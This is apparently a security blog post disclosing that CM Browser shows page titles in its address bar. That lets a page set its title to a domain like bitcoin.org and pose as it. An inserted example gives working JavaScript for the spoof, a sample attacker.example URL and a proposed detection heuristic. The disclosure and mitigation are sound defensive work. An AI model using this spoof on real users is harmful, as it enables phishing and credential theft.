Phishing with the title tag

    Mobile browser developers have long been trying to erase the differences between websites and applications (yes, I am looking at you, PWA), and they are quite good at it. Still, one thing remains that makes the web the web and prevents a user experience fully indistinguishable from a native application: the URL in the browser's address bar. Let's see how, for example, the Chinese CM Browser deals with this problem.
    CM Browser


    Open Habr and you will see that, by default, the page title is displayed in the address bar instead of the URL.



    To see the actual URL, you have to tap the address bar.



    In principle, it is clear how this works. Now the question: is this the real bitcoin.org or not? There is even a green HTTPS padlock.


    bitcoin.org


    In fact, what is shown here is a small script I wrote (change the url parameter in the URL, oddly enough, and try it against other sites). The source code is on GitHub. Note that nothing about the connection is faked: the page really is served over HTTPS, with a valid certificate for its own domain, so the padlock is genuine. The only trick is that the document's title is set to the domain being impersonated, and the browser displays that title exactly where the user expects to see the address.
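    The mechanism described above, as an added example that is not the author's GitHub script: a page reads a url query parameter (the parameter name comes from the post; the default hostname and the test hosts are assumptions) and sets document.title to it, which is all a browser that shows titles in its address bar needs in order to display a foreign domain. The second half is an assumed mitigation such a browser could apply, not anything CM Browser implements: if the title itself looks like a hostname or URL and does not match the host the document was actually loaded from, show the real host instead. The host pattern accepts Unicode letters so that a homograph title is still caught by the mismatch check. The file runs unchanged in a browser (where it performs the spoof) and under Node (where only the functions are defined).

```javascript
// Added example, not the author's GitHub script: the spoof the post describes,
// plus an assumed address-bar heuristic a browser could use against it.

// Read the "url" query parameter (the parameter name is from the post) and use
// it as the page title. The fallback hostname is an assumption for the demo.
function spoofedTitle(search, fallback = "bitcoin.org") {
  const value = new URLSearchParams(search).get("url");
  return value && value.trim() ? value.trim() : fallback;
}

// Matches a bare hostname or a URL and captures the host. Unicode letters and
// digits are allowed so that an IDN homograph such as "bitc\u043Ein.org"
// (Cyrillic o) is still recognised as a host claim.
const HOST_CLAIM_RE =
  /^(?:https?:\/\/)?([\p{L}\p{N}-]+(?:\.[\p{L}\p{N}-]+)+)(?:[\/?#].*)?$/iu;

// Returns the lower-cased host a title is pretending to be, or null if the
// title does not look like a host or URL at all.
function titleClaimsHost(title) {
  const m = HOST_CLAIM_RE.exec(title.trim());
  return m ? m[1].toLowerCase() : null;
}

// Assumed mitigation: decide what an address bar that prefers titles should
// show. An ordinary title ("Habr") is displayed as-is; a title that claims to
// be some host other than the one the document was loaded from is replaced by
// the real host, so the spoof collapses to the attacker's own domain.
function addressBarText(title, realHost) {
  const claimed = titleClaimsHost(title);
  if (claimed !== null && claimed !== realHost.toLowerCase()) {
    return realHost;
  }
  return title;
}

// In a browser, perform the spoof; the guard lets the same file run under Node.
if (typeof document !== "undefined" && typeof location !== "undefined") {
  document.title = spoofedTitle(location.search);
}
```

    Loaded as https://attacker.example/?url=bitcoin.org (hostname assumed), the page's title becomes "bitcoin.org"; with the heuristic in place, addressBarText("bitcoin.org", "attacker.example") falls back to the real host, and a homograph title fails the comparison in exactly the same way, since the claimed host never equals the one the document was served from.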



    This gives a phishing vector that is simple to implement and effective (especially in combination with a homograph domain) against the browser's at least 50 million users. I hope Cheetah Mobile and its parent company Kingsoft will pay attention to this problem as soon as possible.

